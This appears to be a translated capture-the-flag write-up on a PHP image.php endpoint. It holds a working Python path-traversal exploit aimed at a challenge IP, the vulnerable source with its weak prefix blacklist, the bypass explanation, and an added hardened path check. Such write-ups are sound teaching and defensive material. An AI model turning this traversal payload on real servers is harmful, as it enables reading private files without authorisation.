t is the timestamp, f is the base64-encoded file name
import base64
import time
import requests

# t: current Unix timestamp; image.php rejects it if it is more than 10 s off the server clock
now_time = str(int(time.time()))
print(now_time)

def get_file(url, file):
    # f: the requested file name, base64-encoded
    bytes_file = file.encode("utf-8")
    file = base64.b64encode(bytes_file)
    file = file.decode()
    print(file)
    payload = url + "image.php?t=" + now_time + "&f=" + file
    res = requests.get(payload)
    #print(res.text)
    if res.status_code == 200:
        html = res.content.decode('utf-8')
        print(html)
    return False

if __name__ == '__main__':
    url = "http://183.129.189.60:10009/"
    file = "t/../../../../../flag"
    get_file(url, file)
Let's read the source: t/…/…/…/…/…/var/www/html/image.php
<?php
if(!isset($_GET['t']) || !isset($_GET['f'])){
    echo "you miss some parameters";
    exit();
}
$timestamp = time();
if(abs($_GET['t'] - $timestamp) > 10){
    echo "what's your time?";
    exit();
}
$file = base64_decode($_GET['f']);
if(substr($file, 0, strlen("/../")) === "/../"
    || substr($file, 0, strlen("../")) === "../"
    || substr($file, 0, strlen("./")) === "./"
    || substr($file, 0, strlen("/.")) === "/."
    || substr($file, 0, strlen("//")) === "//") {
    echo 'You are not allowed to do that.';
}
else{
    echo file_get_contents('/var/www/html/img/'.$file);
}
?>
I really didn't expect this WAF: prepend any character that is not in the blacklist plus a "/" to the path, add one more path level, and it is bypassed. Also, gqy.jpg and /gqy.jpg return the same output, because a path is concatenated in front of the file name, file_get_contents('/var/www/html/img/'.$file); so stream-wrapper pseudo-protocols can't be used either.
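The blacklist in image.php only inspects the first bytes of the decoded name, so any leading segment not on the list hides the "../" that follows it. As an added example (not part of the original writeup or the challenge code), the Python below mirrors that prefix check next to a hardened check that normalizes the concatenated path and requires it to stay under /var/www/html/img/; the root directory and file names come from the writeup, the function names are my own.

```python
import posixpath

# Directory that image.php prepends to the decoded file name (from the writeup).
IMG_ROOT = "/var/www/html/img"
# The prefixes image.php rejects; only the very start of the string is inspected.
BLACKLIST_PREFIXES = ("/../", "../", "./", "/.", "//")


def blacklist_allows(file):
    """Mirror of the prefix blacklist in image.php.

    Returns True when the name would reach file_get_contents(). A leading
    segment that is not on the list (such as "t/") hides the "../" after it.
    """
    return not any(file.startswith(p) for p in BLACKLIST_PREFIXES)


def hardened_resolve(file, root=IMG_ROOT):
    """Hardened replacement check (example code, not from the original).

    Concatenates exactly as image.php does, normalizes the result lexically,
    and returns the resolved path only if it still lies inside `root`;
    otherwise returns None. Embedded NUL bytes are rejected outright.
    A real deployment would also call realpath() to resolve symlinks.
    """
    if "\x00" in file:
        return None
    joined = root + "/" + file          # same concatenation as the PHP code
    resolved = posixpath.normpath(joined)
    if resolved == root or not resolved.startswith(root + "/"):
        return None
    return resolved


def compare(file):
    """Show both decisions for one decoded file name."""
    return {
        "name": file,
        "blacklist_allows": blacklist_allows(file),
        "hardened_path": hardened_resolve(file),
    }


if __name__ == "__main__":
    # Constructed sample inputs: the writeup's bypass, a blocked form, and
    # the two equivalent spellings of a legitimate image name.
    for name in ("t/../../../../../flag", "../flag", "gqy.jpg", "/gqy.jpg"):
        print(compare(name))
```

The double slash in "/var/www/html/img//gqy.jpg" normalizes away, which is why gqy.jpg and /gqy.jpg behave identically, while the "t/../" name escapes the blacklist but not the containment check.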